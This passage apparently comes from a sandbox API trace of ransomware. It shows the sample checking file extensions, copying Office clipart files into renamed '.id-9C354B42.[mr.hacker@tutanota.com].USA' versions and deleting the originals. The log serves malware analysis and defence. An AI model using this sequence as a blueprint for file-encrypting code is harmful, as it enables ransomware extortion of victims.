lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.053] lstrlenW (lpString=".pdf") returned 4 [0271.053] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.053] lstrlenW (lpString=".xls") returned 4 [0271.053] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.053] lstrlenW (lpString=".xlsx") returned 5 [0271.053] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.053] lstrlenW (lpString=".ppt") returned 4 [0271.053] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0271.053] lstrlenW (lpString=".zip") returned 4 [0271.053] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.054] lstrlenW (lpString=".rar") returned 4 [0271.054] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.054] lstrlenW (lpString=".bz2") returned 4 [0271.054] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.054] lstrlenW (lpString=".7z") returned 3 [0271.054] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0271.054] lstrlenW (lpString=".dbf") returned 4 [0271.054] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0271.054] lstrlenW (lpString=".1cd") returned 4 [0271.054] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0271.054] lstrlenW (lpString=".jpg") returned 4 [0271.054] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.054] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.054] lstrlenW (lpString="FD00090_.WMF") returned 12 [0271.054] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00090_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0271.055] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=14194) returned 1 [0271.055] CloseHandle (hObject=0x39c) returned 1 [0271.055] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00090_.wmf")) returned 0x20 [0271.055] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00090_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.055] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00090_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0271.055] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.055] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.055] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00090_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0271.055] GetLastError () returned 0x0 [0271.055] ReadFile (in: hFile=0x39c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x3772, lpOverlapped=0x0) returned 1 [0271.061] WriteFile (in: hFile=0x328, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x3780, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x3780, lpOverlapped=0x0) returned 1 [0271.062] ReadFile (in: hFile=0x39c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.062] WriteFile (in: hFile=0x328, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.062] SetEndOfFile (hFile=0x328) returned 1 [0271.065] CloseHandle (hObject=0x328) returned 1 [0271.065] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.066] SetEndOfFile (hFile=0x39c) returned 1 [0271.074] CloseHandle (hObject=0x39c) returned 1 [0271.074] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.120] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00090_.wmf")) returned 1 [0271.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63 [0271.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63 [0271.121] lstrlenW (lpString=".doc") returned 4 [0271.121] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.121] lstrlenW (lpString=".docx") returned 5 [0271.121] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.121] lstrlenW (lpString=".pdf") returned 4 [0271.121] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.121] lstrlenW (lpString=".xls") returned 4 [0271.121] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.121] lstrlenW (lpString=".xlsx") returned 5 [0271.121] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.121] lstrlenW (lpString=".ppt") returned 4 [0271.121] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63 [0271.121] lstrlenW (lpString=".zip") returned 4 [0271.121] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.121] lstrlenW (lpString=".rar") returned 4 [0271.121] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.121] lstrlenW (lpString=".bz2") returned 4 [0271.121] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.121] lstrlenW (lpString=".7z") returned 3 [0271.121] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63 [0271.121] lstrlenW (lpString=".dbf") returned 4 [0271.121] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63 [0271.121] lstrlenW (lpString=".1cd") returned 4 [0271.121] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63 [0271.122] lstrlenW (lpString=".jpg") returned 4 [0271.122] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63 [0271.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63 [0271.122] lstrlenW (lpString=".doc") returned 4 [0271.122] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.122] lstrlenW (lpString=".docx") returned 5 [0271.122] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.122] lstrlenW (lpString=".pdf") returned 4 [0271.122] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.122] lstrlenW (lpString=".xls") returned 4 [0271.122] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.122] lstrlenW (lpString=".xlsx") returned 5 [0271.122] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.122] lstrlenW (lpString=".ppt") returned 4 [0271.122] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63 [0271.122] lstrlenW (lpString=".zip") returned 4 [0271.122] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.122] lstrlenW (lpString=".rar") returned 4 [0271.122] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.122] lstrlenW (lpString=".bz2") returned 4 [0271.122] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.122] lstrlenW (lpString=".7z") returned 3 [0271.122] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63 [0271.122] lstrlenW (lpString=".dbf") returned 4 [0271.122] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63 [0271.123] lstrlenW (lpString=".1cd") returned 4 [0271.123] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 63 [0271.123] lstrlenW (lpString=".jpg") returned 4 [0271.123] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.123] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.123] lstrlenW (lpString="FD00306_.WMF") returned 12 [0271.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00306_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0271.123] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=46814) returned 1 [0271.123] CloseHandle (hObject=0x328) returned 1 [0271.123] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00306_.wmf")) returned 0x20 [0271.123] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00306_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00306_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0271.124] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.124] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00306_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0271.124] GetLastError () returned 0x0 [0271.124] ReadFile (in: hFile=0x328, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0xb6de, lpOverlapped=0x0) returned 1 [0271.160] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xb6e0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xb6e0, lpOverlapped=0x0) returned 1 [0271.161] ReadFile (in: hFile=0x328, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.161] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.161] SetEndOfFile (hFile=0x3b0) returned 1 [0271.161] CloseHandle (hObject=0x3b0) returned 1 [0271.161] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.161] SetEndOfFile (hFile=0x328) returned 1 [0271.170] CloseHandle (hObject=0x328) returned 1 [0271.170] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.170] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00306_.wmf")) returned 1 [0271.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63 [0271.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63 [0271.170] lstrlenW (lpString=".doc") returned 4 [0271.170] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.170] lstrlenW (lpString=".docx") returned 5 [0271.170] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.171] lstrlenW (lpString=".pdf") returned 4 [0271.171] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.171] lstrlenW (lpString=".xls") returned 4 [0271.171] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.171] lstrlenW (lpString=".xlsx") returned 5 [0271.171] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.171] lstrlenW (lpString=".ppt") returned 4 [0271.171] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63 [0271.171] lstrlenW (lpString=".zip") returned 4 [0271.171] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.171] lstrlenW (lpString=".rar") returned 4 [0271.171] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.171] lstrlenW (lpString=".bz2") returned 4 [0271.171] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.171] lstrlenW (lpString=".7z") returned 3 [0271.171] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63 [0271.171] lstrlenW (lpString=".dbf") returned 4 [0271.171] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63 [0271.263] lstrlenW (lpString=".1cd") returned 4 [0271.263] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63 [0271.263] lstrlenW (lpString=".jpg") returned 4 [0271.263] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63 [0271.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63 [0271.263] lstrlenW (lpString=".doc") returned 4 [0271.263] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.263] lstrlenW (lpString=".docx") returned 5 [0271.263] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.264] lstrlenW (lpString=".pdf") returned 4 [0271.264] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.264] lstrlenW (lpString=".xls") returned 4 [0271.264] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.264] lstrlenW (lpString=".xlsx") returned 5 [0271.264] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.264] lstrlenW (lpString=".ppt") returned 4 [0271.264] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63 [0271.264] lstrlenW (lpString=".zip") returned 4 [0271.264] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.264] lstrlenW (lpString=".rar") returned 4 [0271.264] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.264] lstrlenW (lpString=".bz2") returned 4 [0271.264] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.264] lstrlenW (lpString=".7z") returned 3 [0271.264] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63 [0271.264] lstrlenW (lpString=".dbf") returned 4 [0271.264] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63 [0271.264] lstrlenW (lpString=".1cd") returned 4 [0271.264] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63 [0271.264] lstrlenW (lpString=".jpg") returned 4 [0271.264] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.264] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.265] lstrlenW (lpString="FD00414_.WMF") returned 12 [0271.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00414_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.288] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=11002) returned 1 [0271.288] CloseHandle (hObject=0x394) returned 1 [0271.288] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00414_.wmf")) returned 0x20 [0271.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00414_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.359] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00414_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0271.359] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.359] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.359] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00414_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0271.359] GetLastError () returned 0x0 [0271.359] ReadFile (in: hFile=0x328, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x2afa, lpOverlapped=0x0) returned 1 [0271.366] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x2b00, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x2b00, lpOverlapped=0x0) returned 1 [0271.367] ReadFile (in: hFile=0x328, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.367] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.367] SetEndOfFile (hFile=0x3b0) returned 1 [0271.374] CloseHandle (hObject=0x3b0) returned 1 [0271.375] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.380] SetEndOfFile (hFile=0x328) returned 1 [0271.412] CloseHandle (hObject=0x328) returned 1 [0271.412] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.426] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00414_.wmf")) returned 1 [0271.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63 [0271.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63 [0271.461] lstrlenW (lpString=".doc") returned 4 [0271.461] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.461] lstrlenW (lpString=".docx") returned 5 [0271.461] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.461] lstrlenW (lpString=".pdf") returned 4 [0271.461] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.461] lstrlenW (lpString=".xls") returned 4 [0271.461] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.461] lstrlenW (lpString=".xlsx") returned 5 [0271.461] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.461] lstrlenW (lpString=".ppt") returned 4 [0271.461] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63 [0271.461] lstrlenW (lpString=".zip") returned 4 [0271.461] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.461] lstrlenW (lpString=".rar") returned 4 [0271.461] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.461] lstrlenW (lpString=".bz2") returned 4 [0271.461] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.461] lstrlenW (lpString=".7z") returned 3 [0271.461] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63 [0271.461] lstrlenW (lpString=".dbf") returned 4 [0271.461] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63 [0271.462] lstrlenW (lpString=".1cd") returned 4 [0271.462] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63 [0271.462] lstrlenW (lpString=".jpg") returned 4 [0271.462] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63 [0271.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63 [0271.462] lstrlenW (lpString=".doc") returned 4 [0271.462] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.462] lstrlenW (lpString=".docx") returned 5 [0271.462] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.462] lstrlenW (lpString=".pdf") returned 4 [0271.462] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.462] lstrlenW (lpString=".xls") returned 4 [0271.462] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.462] lstrlenW (lpString=".xlsx") returned 5 [0271.462] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.462] lstrlenW (lpString=".ppt") returned 4 [0271.462] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") 